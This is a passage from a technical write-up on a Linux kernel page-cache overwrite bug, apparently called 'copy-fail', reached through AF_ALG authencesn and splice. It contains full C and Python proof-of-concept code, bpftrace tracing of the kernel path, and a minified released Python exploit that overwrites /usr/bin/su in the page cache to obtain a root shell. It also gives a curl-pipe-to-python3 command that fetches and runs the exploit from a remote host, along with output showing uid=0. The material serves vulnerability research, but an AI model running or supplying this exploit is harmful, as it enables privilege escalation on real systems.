if (splice(pipefd[0], NULL, op_fd, NULL, splice_len, 0) < 0)
die("splice(pipe -> AF_ALG)");
printf("[+] splice(pipe -> AF_ALG): 0x%zx bytes\n", splice_len);
/*
* 7. Trigger decrypt.
* Authentication is expected to fail; the scratch write is the point.
*/
if (recv(op_fd, rx, sizeof(rx), 0) < 0)
fprintf(stderr, "recv failed as expected: %s\n", strerror(errno));
else
printf("[+] recv returned data\n");
print_marker("[+] marker after ", target, overwrite_off);
printf("[+] verify cached bytes : xxd -g1 -s 0x1220 -l 0x40 %s\n", target);
printf("[+] verify cache vs disk: sudo sh -c 'echo 3 > /proc/sys/vm/drop_caches'\n");
printf("[+] then re-read : xxd -g1 -s 0x1220 -l 0x40 %s\n", target);
printf("[+] success signal : ORIG -> PWN! before drop_caches, then ORIG after drop_caches\n");
close(file_fd);
close(pipefd[0]);
close(pipefd[1]);
close(op_fd);
close(tfm_fd);
return 0;
}5.4.2 Verification
Compile the C PoC:
gcc -Wall -Wextra -O2 -o copyfail_poc copyfail_poc.cThe PoC creates ./target.bin by itself and places ORIG at 0x1234:
axura@pwnlab:~/lab/copy-fail$ vim copyfail_poc.c axura@pwnlab:~/lab/copy-fail$ gcc -Wall -Wextra -O2 -o copyfail_poc copyfail_poc.c axura@pwnlab:~/lab/copy-fail$ ls -li total 32 1587064 -rwxrwxr-x 1 axura axura 17160 May 16 19:42 copyfail_poc 1587063 -rw-rw-r-- 1 axura axura 8595 May 16 19:42 copyfail_poc.c axura@pwnlab:~/lab/copy-fail$ ./copyfail_poc [+] target : ./target.bin [+] overwrite : file offset 0x1234 [+] splice : offset=0x1224 len=0x20 authsize=0x10 [+] write value : PWN! [+] marker before @ 0x1234 = 4f 52 49 47 (ORIG) [+] bound AF_ALG: type=aead name=authencesn(hmac(sha256),cbc(aes)) [+] AEAD configured: authkey=32, enckey=16, authsize=0x10 [+] accepted operation socket: fd=4 [+] AAD queued: assoclen=8, AAD[4:8]=PWN! [+] splice(file -> pipe): 0x20 bytes from file offset 0x1224 [+] splice(pipe -> AF_ALG): 0x20 bytes recv failed as expected: Bad message [+] marker after @ 0x1234 = 50 57 4e 21 (PWN!) [+] verify cached bytes : xxd -g1 -s 0x1220 -l 0x40 ./target.bin [+] verify cache vs disk: sudo sh -c 'echo 3 > /proc/sys/vm/drop_caches' [+] then re-read : xxd -g1 -s 0x1220 -l 0x40 ./target.bin [+] success signal : ORIG -> PWN! before drop_caches, then ORIG after drop_caches axura@pwnlab:~/lab/copy-fail$ ls -li total 44 1587064 -rwxrwxr-x 1 axura axura 17160 May 16 19:42 copyfail_poc 1587063 -rw-rw-r-- 1 axura axura 8595 May 16 19:42 copyfail_poc.c 1587070 -r--r--r-- 1 axura axura 12288 May 16 19:42 target.bin
After running it once, inspect the marker:
axura@pwnlab:~/lab/copy-fail$ xxd -g1 -s 0x1220 -l 0x40 ./target.bin 00001220: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00001230: 41 41 41 41 50 57 4e 21 41 41 41 41 41 41 41 41 AAAAPWN!AAAAAAAA 00001240: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00001250: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
This confirms the first half of the primitive:
recv()returned an error (Bad message), so the AEAD decrypt operation did not succeed semantically.- Yet
target.bin[0x1234:0x1238]changed fromORIGtoPWN!.
That already proves the overwrite is triggered before the final authentication failure returns to userspace.
To distinguish page-cache corruption from a persistent file write, drop clean cache state and read the same bytes again:
# asks the kernel to reclaim clean page cache, dentries, and inodes
sudo sh -c 'echo 3 > /proc/sys/vm/drop_caches'
# now xxd reads come from disk instead of the previously corrupted cache page
xxd -g1 -s 0x1220 -l 0x40 ./target.binThis cache-vs-disk check only works if the original target.bin page is already clean before the overwrite is triggered. So the PoC first writes the baseline ORIG marker to disk and then calls fsync(), ensuring that a later drop_caches can evict the cached file page instead of keeping it as ordinary dirty file data.
axura@pwnlab:~/lab/copy-fail$ sudo sh -c 'echo 3 > /proc/sys/vm/drop_caches' axura@pwnlab:~/lab/copy-fail$ xxd -g1 -s 0x1220 -l 0x40 ./target.bin 00001220: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00001230: 41 41 41 41 4f 52 49 47 41 41 41 41 41 41 41 41 AAAAORIGAAAAAAAA 00001240: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00001250: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
The marker is back to ORIG. So the PoC did not persist a file write to disk. It only corrupted the cached file page.
5.5 PoC In Python
5.5.1 Python PoC
This mirrors the same request shape in Python, including the full authencesn key blob and the AEAD control messages attached to sendmsg().
It can also be download from my repo as proof-of-concept/copyfail_poc.py:
# copyfail_poc.py
import os
import struct
import socket
from pathlib import Path
AF_ALG = 38
SOL_ALG = 279
ALG_SET_KEY = 1
ALG_SET_IV = 2
ALG_SET_OP = 3
ALG_SET_AEAD_ASSOCLEN = 4
ALG_SET_AEAD_AUTHSIZE = 5
ALG_OP_DECRYPT = 0
CRYPTO_AUTHENC_KEYA_PARAM = 1
target = "./target.bin"
overwrite_off = 0x1234
authsize = 0x10
splice_len = 0x20
splice_off = overwrite_off - (splice_len - authsize)
write_value = b"PWN!"
aad = b"A" * 4 + write_value
def marker(label):
with target_path.open("rb") as f:
f.seek(overwrite_off)
b = f.read(4)
print(f"{label} @ 0x{overwrite_off:x} = {b.hex(' ')} ({b!r})")
print(f"[+] target : {Path(target).expanduser()}")
print(f"[+] overwrite : file offset 0x{overwrite_off:x}")
print(f"[+] splice : offset=0x{splice_off:x} len=0x{splice_len:x} authsize=0x{authsize:x}")
print(f"[+] write value : {write_value!r}")
# 1. Create a harmless read-only lab target.
target_path = Path(target).expanduser()
target_path.parent.mkdir(parents=True, exist_ok=True)
data = bytearray(b"X" * 0x3000)
data[overwrite_off:overwrite_off + 4] = b"ORIG"
target_path.write_bytes(data)
with target_path.open("rb") as f:
os.fsync(f.fileno())
target_path.chmod(0o444)
marker("[+] marker before")
# 2. Open AF_ALG transform socket.
tfm = socket.socket(AF_ALG, socket.SOCK_SEQPACKET, 0)
try:
tfm.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))
except FileNotFoundError:
print("[!] AF_ALG could not resolve authencesn(hmac(sha256),cbc(aes)).")
print("[!] Check /proc/crypto and try: sudo modprobe authencesn")
raise
print("[+] bound AF_ALG: type=aead name=authencesn(hmac(sha256),cbc(aes))")
# 3. Configure the authenc-compatible key blob and authsize, then accept.
key_blob = (
struct.pack("HH", 8, CRYPTO_AUTHENC_KEYA_PARAM) +
struct.pack("!I", 16) +
(b"A" * 32) +
(b"B" * 16)
)
tfm.setsockopt(SOL_ALG, ALG_SET_KEY, key_blob)
tfm.setsockopt(SOL_ALG, ALG_SET_AEAD_AUTHSIZE, None, authsize)
print("[+] AEAD configured: authkey=32, enckey=16, authsize=0x10")
op, _ = tfm.accept()
print(f"[+] accepted operation socket: fd={op.fileno()}")
# 4. Queue attacker-controlled AAD.
# AAD[4:8] is the 4-byte value authencesn later writes.
iv = struct.pack("I", 16) + (b"\x44" * 16)
op.sendmsg(
[aad],
[
(SOL_ALG, ALG_SET_OP, struct.pack("I", ALG_OP_DECRYPT)),
(SOL_ALG, ALG_SET_IV, iv),
(SOL_ALG, ALG_SET_AEAD_ASSOCLEN, struct.pack("I", len(aad))),
],
socket.MSG_MORE,
)
print(f"[+] AAD queued: assoclen={len(aad)}, AAD[4:8]={write_value!r}")
# 5. Splice target file bytes into a pipe.
r, w = os.pipe()
fd = os.open(str(target_path), os.O_RDONLY)
os.splice(fd, w, splice_len, splice_off, None, 0)
print(f"[+] splice(file -> pipe): 0x{splice_len:x} bytes from file offset 0x{splice_off:x}")
# 6. Splice pipe into AF_ALG operation socket.
os.splice(r, op.fileno(), splice_len, None, None, 0)
print(f"[+] splice(pipe -> AF_ALG): 0x{splice_len:x} bytes")
# 7. Trigger decrypt. Authentication is expected to fail.
try:
op.recv(0x1000)
print("[+] recv returned data")
except OSError as e:
print(f"recv failed as expected: {e}")
marker("[+] marker after ")
print(f"[+] verify cached bytes : xxd -g1 -s 0x1220 -l 0x40 {target_path}")
print("[+] verify cache vs disk: sudo sh -c 'echo 3 > /proc/sys/vm/drop_caches'")
print(f"[+] then re-read : xxd -g1 -s 0x1220 -l 0x40 {target_path}")
print("[+] success signal : ORIG -> PWN! before drop_caches, then ORIG after drop_caches")
os.close(fd)
os.close(r)
os.close(w)
op.close()
tfm.close()5.5.2 Verification
The Python PoC also creates ./target.bin by itself:
axura@pwnlab:~/lab/copy-fail$ vim copyfail_poc.py axura@pwnlab:~/lab/copy-fail$ ls copyfail_poc.py axura@pwnlab:~/lab/copy-fail$ python3 copyfail_poc.py [+] target : target.bin [+] overwrite : file offset 0x1234 [+] splice : offset=0x1224 len=0x20 authsize=0x10 [+] write value : b'PWN!' [+] marker before @ 0x1234 = 4f 52 49 47 (b'ORIG') [+] bound AF_ALG: type=aead name=authencesn(hmac(sha256),cbc(aes)) [+] AEAD configured: authkey=32, enckey=16, authsize=0x10 [+] accepted operation socket: fd=4 [+] AAD queued: assoclen=8, AAD[4:8]=b'PWN!' [+] splice(file -> pipe): 0x20 bytes from file offset 0x1224 [+] splice(pipe -> AF_ALG): 0x20 bytes recv failed as expected: [Errno 74] Bad message [+] marker after @ 0x1234 = 50 57 4e 21 (b'PWN!') [+] verify cached bytes : xxd -g1 -s 0x1220 -l 0x40 target.bin [+] verify cache vs disk: sudo sh -c 'echo 3 > /proc/sys/vm/drop_caches' [+] then re-read : xxd -g1 -s 0x1220 -l 0x40 target.bin [+] success signal : ORIG -> PWN! before drop_caches, then ORIG after drop_caches axura@pwnlab:~/lab/copy-fail$ ls -li total 16 1587064 -rw-rw-r-- 1 axura axura 3572 May 16 19:50 copyfail_poc.py 1585040 -r--r--r-- 1 axura axura 12288 May 16 19:50 target.bin
Then inspect the marker:
axura@pwnlab:~/lab/copy-fail$ xxd -g1 -s 0x1220 -l 0x40 ./target.bin 00001220: 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 00001230: 58 58 58 58 50 57 4e 21 58 58 58 58 58 58 58 58 XXXXPWN!XXXXXXXX 00001240: 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 00001250: 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
That proves the page-cache copy changed again, but not the disk file was written yet. To check the disk/cache distinction, drop clean page-cache state and read the file again like we did in 5.4.2:
axura@pwnlab:~/lab/copy-fail$ sudo sh -c 'echo 3 > /proc/sys/vm/drop_caches' axura@pwnlab:~/lab/copy-fail$ xxd -g1 -s 0x1220 -l 0x40 ./target.bin 00001220: 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 00001230: 58 58 58 58 4f 52 49 47 58 58 58 58 58 58 58 58 XXXXORIGXXXXXXXX 00001240: 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 00001250: 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
The overwrite affected the cached file page, not the persistent file contents on disk.
6 Hack in Motion
The PoC already proves the end result. This section is for watching the chain while it happens:
file page
-> pipe buffer
-> AF_ALG TX scatterlist
-> chained decrypt request
-> authencesn scratch write
-> modified page-cache bytesWe will debug the C PoC built in Section 5.4. This time, compile it with debug symbols so GDB can track source lines, and drop the page cache before each run so target.bin starts from a clean state:
# Build the PoC with debug symbols.
# -g keeps source/line information for GDB.
# -O2 is kept so the binary stays close to the normal PoC build.
gcc -g -Wall -Wextra -O2 -o copyfail_poc copyfail_poc.c
# Clear page cache before testing.
# This helps ensure target.bin is reloaded cleanly instead of reusing
# stale cached state from an earlier run.
sudo sh -c 'echo 3 > /proc/sys/vm/drop_caches'When everything's ready:
axura@pwnlab:~/lab/copy-fail$ ls copyfail_poc.c axura@pwnlab:~/lab/copy-fail$ gcc -g -Wall -Wextra -O2 -o copyfail_poc copyfail_poc.c axura@pwnlab:~/lab/copy-fail$ file copyfail_poc copyfail_poc: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, i nterpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=d5c1981a6cc356da8eb8cfc5c0635552f6ecd9 e7, for GNU/Linux 3.2.0, with debug_info, not stripped axura@pwnlab:~/lab/copy-fail$ ./copyfail_poc [+] target : ./target.bin [+] overwrite : file offset 0x1234 [+] splice : offset=0x1224 len=0x20 authsize=0x10 [+] write value : PWN! [+] marker before @ 0x1234 = 4f 52 49 47 (ORIG) [+] bound AF_ALG: type=aead name=authencesn(hmac(sha256),cbc(aes)) [+] AEAD configured: authkey=32, enckey=16, authsize=0x10 [+] accepted operation socket: fd=4 [+] AAD queued: assoclen=8, AAD[4:8]=PWN! [+] splice(file -> pipe): 0x20 bytes from file offset 0x1224 [+] splice(pipe -> AF_ALG): 0x20 bytes recv failed as expected: Bad message [+] marker after @ 0x1234 = 50 57 4e 21 (PWN!) [+] verify cached bytes : xxd -g1 -s 0x1220 -l 0x40 ./target.bin [+] verify cache vs disk: sudo sh -c 'echo 3 > /proc/sys/vm/drop_caches' [+] then re-read : xxd -g1 -s 0x1220 -l 0x40 ./target.bin [+] success signal : ORIG -> PWN! before drop_caches, then ORIG after drop_caches axura@pwnlab:~/lab/copy-fail$ ls -li total 60 1585040 -rwxrwxr-x 1 axura axura 34936 May 16 20:22 copyfail_poc 1587064 -rw-rw-r-- 1 axura axura 8595 May 16 20:08 copyfail_poc.c 1587070 -r--r--r-- 1 axura axura 12288 May 16 20:22 target.bin axura@pwnlab:~/lab/copy-fail$ xxd -g1 -s 0x1220 -l 0x40 ./target.bin 00001220: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00001230: 41 41 41 41 50 57 4e 21 41 41 41 41 41 41 41 41 AAAAPWN!AAAAAAAA 00001240: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00001250: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA axura@pwnlab:~/lab/copy-fail$ sudo sh -c 'echo 3 > /proc/sys/vm/drop_caches' axura@pwnlab:~/lab/copy-fail$ xxd -g1 -s 0x1220 -l 0x40 ./target.bin 00001220: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00001230: 41 41 41 41 4f 52 49 47 41 41 41 41 41 41 41 41 AAAAORIGAAAAAAAA 00001240: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00001250: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
we dive into the debugging journey.
6.1 Instrumentation Setup
Use two terminals:
- terminal A: run
bpftraceprobes; - terminal B: run
./copyfail_pocandxxd.
Before attaching probes, verify that the symbols exist on the running kernel:
sudo grep -wE \
'filemap_splice_read|splice_folio_into_pipe|af_alg_sendmsg|extract_iter_to_sg|crypto_authenc_esn_decrypt|scatterwalk_map_and_copy' \
/proc/kallsymsThe exact names we care about are:
filemap_splice_read(): regular file bytes enter the splice path from page cache.splice_folio_into_pipe(): the cached folio becomes apipe_buffer.af_alg_sendmsg():sendmsg()andMSG_SPLICE_PAGESinput enterAF_ALG.extract_iter_to_sg():AF_ALGconverts incoming iterators into TX scatterlist entries.crypto_authenc_esn_decrypt(): the selectedauthencesndecrypt callback runs.scatterwalk_map_and_copy(): the final 4-byte write walks the destination scatterlist.
If one of these symbols is missing, first check whether the corresponding module is loaded. For the PoC path, af_alg, algif_aead, and authencesn must be active:
axura@pwnlab:~/lab/copy-fail$ sudo grep -wE \ 'filemap_splice_read|splice_folio_into_pipe|af_alg_sendmsg|extract_iter_to_sg|crypto_authe nc_esn_decrypt|scatterwalk_map_and_copy' \ /proc/kallsyms ffffffff9ddbdd80 T splice_folio_into_pipe ffffffff9ddbdee0 T filemap_splice_read ffffffff9e185870 T scatterwalk_map_and_copy ffffffff9e257100 T extract_iter_to_sg ffffffff9ebc57ec t splice_folio_into_pipe.cold ffffffffc0a8e2c0 t crypto_authenc_esn_decrypt [authencesn] ffffffffc0a774e3 t af_alg_sendmsg.cold [af_alg] ffffffffc0a76520 t af_alg_sendmsg [af_alg]
This confirms the key probe targets are present on the running kernel, so the following bpftrace steps can attach to the real exploit path instead of to fallback or missing code.
6.2 Page Cache Before And After
Before the trigger, the marker should be the disk value:
target.bin[0x1234:0x1238] = ORIGThen run the PoC again and we observe the same behaviour as in 5.4.2, that the normal file read observes the corruption again:
axura@pwnlab:~/lab/copy-fail$ sudo ./copyfail_poc [+] target : ./target.bin [+] overwrite : file offset 0x1234 [+] splice : offset=0x1224 len=0x20 authsize=0x10 [+] write value : PWN! [+] marker before @ 0x1234 = 4f 52 49 47 (ORIG) [+] bound AF_ALG: type=aead name=authencesn(hmac(sha256),cbc(aes)) [+] AEAD configured: authkey=32, enckey=16, authsize=0x10 [+] accepted operation socket: fd=4 [+] AAD queued: assoclen=8, AAD[4:8]=PWN! [+] splice(file -> pipe): 0x20 bytes from file offset 0x1224 [+] splice(pipe -> AF_ALG): 0x20 bytes recv failed as expected: Bad message [+] marker after @ 0x1234 = 50 57 4e 21 (PWN!) [+] verify cached bytes : xxd -g1 -s 0x1220 -l 0x40 ./target.bin [+] verify cache vs disk: sudo sh -c 'echo 3 > /proc/sys/vm/drop_caches' [+] then re-read : xxd -g1 -s 0x1220 -l 0x40 ./target.bin [+] success signal : ORIG -> PWN! before drop_caches, then ORIG after drop_caches axura@pwnlab:~/lab/copy-fail$ xxd -g1 -s 0x1220 -l 0x40 ./target.bin 00001220: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00001230: 41 41 41 41 50 57 4e 21 41 41 41 41 41 41 41 41 AAAAPWN!AAAAAAAA 00001240: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 00001250: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
This confirms the userspace-visible side of the page-cache corruption. The next probe confirms how the file page entered the pipe and then AF_ALG.
6.3 Inpsect File → Pipe
The next probe verifies the first kernel handoff:
target file page cache
│
▼
pipe bufferThis is the splice(file -> pipe) stage. We want to confirm that the PoC's selected file range:
splice_file_offset = 0x1224
splice_len = 0x20is read from the target file's page-cache mapping and handed into the pipe as a cached folio, not copied into a private userspace buffer.
Run this in terminal A:
sudo bpftrace -e '
kprobe:filemap_splice_read /comm == "copyfail_poc"/
{
$file = (struct file *)arg0;
$mapping = $file->f_mapping;
$inode = $mapping->host;
$pos = *(uint64 *)arg1;
printf("filemap_splice_read: ino=%lu pos=0x%llx len=0x%lx mapping=%p nrpages=%lu\n",
$inode->i_ino, $pos, arg3, $mapping, $mapping->nrpages);
}
kprobe:splice_folio_into_pipe /comm == "copyfail_poc"/
{
printf("splice_folio_into_pipe: pipe=%p folio=%p offset=0x%lx size=0x%lx\n",
arg0, arg1, arg2, arg3);
}
'The first probe targets filemap_splice_read(), whose signature is:
ssize_t filemap_splice_read(struct file *in, loff_t *ppos,
struct pipe_inode_info *pipe, size_t len,
unsigned int flags)So the probe arguments are:
| Probe value | Kernel argument | Meaning |
|---|---|---|
| arg0 | struct file *in | input file being spliced |
| arg1 | loff_t *ppos | pointer to current file offset |
| arg2 | struct pipe_inode_info *pipe | destination pipe |
| arg3 | size_t len | requested splice length |
Because arg1 is a pointer to loff_t, the probe dereferences it:
$pos = *(uint64 *)arg1;The probe also walks the file-cache relationship directly:
$file = (struct file *)arg0;
$mapping = $file->f_mapping;
$inode = $mapping->host;Those fields map to the file's page-cache objects:
in->f_mappingpoints from the opened file to its address-space mapping.mapping->hostpoints from that mapping back to the backing inode.mapping->nrpagestracks pages currently present in that address space.
So when the probe prints:
ino=...
mapping=...
nrpages=...it is showing the target file's page-cache mapping, not a random kernel address.
Then run the PoC in terminal B (sudo overwrites any left-over target.bin genreated earlier):
sudo ./copyfail_pocResult:

Observed probe output:
filemap_splice_read: ino=1587070 pos=0x1224 len=0x20 mapping=0xffff9f06d4964ca0 nrpages=3
splice_folio_into_pipe: pipe=0xffff9f06ea4ce3c0 folio=0xffffe57688cb1900 offset=0x1224 size=0x20The first line confirms the live file splice window:
inode = 1587070
pos = 0x1224
len = 0x20That matches the PoC layout:
splice_file_offset = 0x1224
splice_len = 0x20The inode value comes from mapping->host, and the mapping value comes from in->f_mapping, so this line ties the splice operation back to the target file's page-cache address space.
Inside filemap_splice_read(), the selected cached folio is handed into the pipe through splice_folio_into_pipe():
n = splice_folio_into_pipe(pipe, folio, *ppos, n);The second probe line confirms that handoff:
pipe = 0xffff9f06ea4ce3c0
folio = 0xffffe57688cb1900
offset = 0x1224
size = 0x20This is the important transition:
target file
│
▼
file address_space mapping
│
▼
cached folio
│
▼
pipe bufferSo at this point, the target file bytes have not been copied into a private anonymous buffer. The pipe now carries a reference to the cached file folio selected by the splice window. This proves the first handoff in the exploit chain:
target.bin @ 0x1224, len 0x20
│
▼
page-cache folio
│
▼
pipe buffer referenceThis keeps the probe focused on file → pipe only. The next probe should cover the next handoff: pipe → socket / AF_ALG TX scatterlist.
6.4 Inpsect Pipe → AF_ALG
The next handoff is:
pipe-backed file page
│
▼
socket send path
│
▼
AF_ALG TX scatterlistIn splice_to_socket(), pipe-backed pages are wrapped into a socket message. The important part is that the message is marked as page-backed before it is sent into the socket layer:
msg.msg_flags = MSG_SPLICE_PAGES;
...
ret = sock_sendmsg(sock, &msg);For an accepted AEAD operation socket, that sock_sendmsg() call reaches af_alg_sendmsg(). Inside that function, the exploit-relevant path is selected by MSG_SPLICE_PAGES:
if (msg->msg_flags & MSG_SPLICE_PAGES) {
plen = extract_iter_to_sg(&msg->msg_iter, len, &sgtable, ...);
...
}This is the conversion point:
pipe-backed socket message
│
▼
msg_iter marked MSG_SPLICE_PAGES
│
▼
extract_iter_to_sg()
│
▼
AF_ALG TX scatterlistOn this kernel, extract_iter_to_sg() is not directly traceable with kprobe. So instead, we probe the traceable AF_ALG entry point and inspect the incoming msghdr.
Run this in terminal A:
sudo bpftrace -e '
kprobe:af_alg_sendmsg /comm == "copyfail_poc"/
{
$msg = (struct msghdr *)arg1;
printf("af_alg_sendmsg: size=0x%lx msg_flags=0x%x\n",
arg2, $msg->msg_flags);
}
'Then run the PoC in terminal B:
sudo ./copyfail_pocResult:

The probe records two calls into af_alg_sendmsg():
af_alg_sendmsg: size=0x8 msg_flags=0x8000
af_alg_sendmsg: size=0x20 msg_flags=0x8000000They match the two inputs staged by the PoC:
| Call | Size | Flag | Meaning |
|---|---|---|---|
normal sendmsg() | 0x8 | 0x8000 | queues the 8-byte AAD: "AAAA" "PWN!" |
splice(pipe -> AF_ALG) | 0x20 | 0x8000000 | queues the 32-byte file-backed splice window |
The first line is the AAD fragment:
size=0x8
AAD = "AAAA" || "PWN!"The second line is the file-backed splice fragment:
size=0x20
target.bin[0x1224:0x1244]
= [0x10 ciphertext/filler][0x10 tag region]The important flag is 0x8000000, which matches MSG_SPLICE_PAGES. That flag is set by splice_to_socket() before calling sock_sendmsg().
So the live path is:
splice(file -> pipe)
│
▼
pipe buffer references file-backed page
│
▼
splice(pipe -> AF_ALG socket)
│
▼
splice_to_socket()
│
▼
sock_sendmsg(... MSG_SPLICE_PAGES ...)
│
▼
af_alg_sendmsg()
│
▼
MSG_SPLICE_PAGES branch
│
▼
extract_iter_to_sg()
│
▼
AF_ALG TX scatterlistSo this probe confirms the second handoff: the file-backed data is no longer only sitting behind a pipe buffer. It has entered the AF_ALG send path as a page-backed MSG_SPLICE_PAGES payload, ready to be imported into the AEAD TX scatterlist.
6.5 Inspect Authencesn Scratch Write
The final runtime pivot happens inside the selected AEAD implementation. By this point, the inputs are already staged:
- normal
sendmsg(): AAD ="AAAA" || "PWN!" splice(pipe -> AF_ALG): 0x20-byte file-backed TX window →[0x10 ciphertext][0x10 tag]
Now recv() submits the prepared AEAD request. The generic crypto layer dispatches into crypto_authenc_esn_decrypt(), where the interesting write is:
scatterwalk_map_and_copy(
tmp + 1, // source: AAD[4:8]
dst, // target scatterlist
assoclen + cryptlen, // logical destination offset
4, // 4-byte write
1 // write flag: tmp+1 -> dst @ assoclen+cryptlen
);For the lab layout:
assoclen = 0x8
req->cryptlen = 0x20 // ciphertext || tag
authsize = 0x10
effective cryptlen = 0x10 // after cryptlen -= authsize
scratch write offset = assoclen + effective cryptlen
= 0x8 + 0x10
= 0x18
write length = 4
write value = AAD[4:8] = "PWN!"Attach this probe:
sudo bpftrace -e '
kprobe:crypto_authenc_esn_decrypt /comm == "copyfail_poc"/
{
$req = (struct aead_request *)arg0;
printf("authencesn_decrypt: assoclen=0x%x cryptlen=0x%x src=%p dst=%p expected_scratch_off=0x%x\n",
$req->assoclen, $req->cryptlen, $req->src, $req->dst,
$req->assoclen + $req->cryptlen - 0x10);
}
kprobe:scatterwalk_map_and_copy
/comm == "copyfail_poc" && arg2 == 0x18 && arg3 == 4 && arg4 == 1/
{
printf("scratch_write: sg=%p off=0x%lx len=%lu out=%lu value_le=0x%x\n",
arg1, arg2, arg3, arg4, *(uint32 *)arg0);
}
'Result:

Observed:
authencesn_decrypt: assoclen=0x8 cryptlen=0x20 src=0xffff9f06ca980020 dst=0xffff9f06ca980020 expected_scratch_off=0x18
scratch_write: sg=0xffff9f06ca980020 off=0x18 len=4 out=1 value_le=0x214e5750The first line confirms the request shape at the entry of crypto_authenc_esn_decrypt():
assoclen = 0x8
req->cryptlen = 0x20
src == dst = in-place requestAt function entry, req->cryptlen still describes:
ciphertext || tagSo the probe computes the expected scratch-write offset by subtracting the configured tag size:
expected_scratch_off = assoclen + req->cryptlen - authsize
= 0x8 + 0x20 - 0x10
= 0x18That matches the second probe line:
scratch_write: off=0x18 len=4 out=1That boundary is the one used by the actual vulnerable operation:
scatterwalk_map_and_copy(
void tmp[1], // 0xffff9f06ca980020+8
struct scatterlist *sg = dist, // 0xffff9f06ca980020
unsigned int start = 0x18, // destination: dist + 0x18
unsigned int nbytes = 4, // write 4 bytes
int out = 1); // write from 0xffff9f06ca980020+0x8 to 0xffff9f06ca980020+0x18
);At the end, 0x214e5750 was written to the destination, which is exactly the string "PWN!" interpreted as a little-endian uint32_t:
50 57 4e 21 -> "PWN!"This confirms the vulnerable operation itself: authencesn performs a destination-side 4-byte write at the boundary between the copied decrypt output and the chained tag tail. Because the tag tail came from the spliced file-backed pipe buffer, that write lands on the cached file page.
The final userspace check closes the loop:
xxd -g1 -s 0x1220 -l 0x40 ./target.bin
sudo sh -c 'echo 3 > /proc/sys/vm/drop_caches'
xxd -g1 -s 0x1220 -l 0x40 ./target.binResult as expected:

The final xxd output shows the same two-phase result established earlier by the PoC: before drop_caches, the normal file read observes PWN!; after drop_caches, rereading returns to ORIG. That closes the runtime chain from:
filemap_splice_read()→af_alg_sendmsg()→crypto_authenc_esn_decrypt()
That is a 4-byte write lands in page cache, while the on-disk file remains unchanged.
7 Exploit Implementations
This chapter turns the page-cache overwrite primitive into full exploit implementations, with variants for different programming languages and Linux environments.
7.1 Official Release
7.1.1 732-byte Python Exploit
The official released Python exploit is deleberately designed to be minimal:
#!/usr/bin/env python3
import os as g,zlib,socket as s
def d(x):return bytes.fromhex(x)
def c(f,t,c):
a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
try:u.recv(8+t)
except:0
f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
while i<len(e):c(f,i,e[i:i+4]);i+=4
g.system("su")It leverages Python 3.10+ stdlib only (os, socket, zlib), targeting /usr/bin/su by default:
curl https://copy.fail/exp | python3 && suOr attacker can pass another setuid binary as argv[1]:
axura@pwnlab:~$ curl https://copy.fail/exp | python3 - passwd && su % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 731 0 731 0 0 2310 0 --:--:-- --:--:-- --:--:-- 2305 # id uid=0(root) gid=1000(axura) groups=1000(axura),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),100(users),114(lpadmin)
7.1.2 Artifacts From Origin
Two encoded values in the original script are worth making explicit before the full listing.
7.1.2.1 ALG_SET_KEY: The authenc Key Blob
ALG_SET_KEY does not take a raw AES key here. For authencesn(hmac(sha256),cbc(aes)), the socket needs an authenc key blob, parsed by crypto_authenc_extractkeys() — an 8-byte rtattr header plus crypto_authenc_key_param, followed by the concatenated HMAC key and AES key. In the released exploit, the encoded blob:
08000100 00000010 00000000000000000000000000000000 00000000000000000000000000000000Decoded:
authenc key blob
════════════════════════════════════════════════════════════
08 00 01 00 | 00 00 00 10 | 00 ... 00 | 00 ... 00
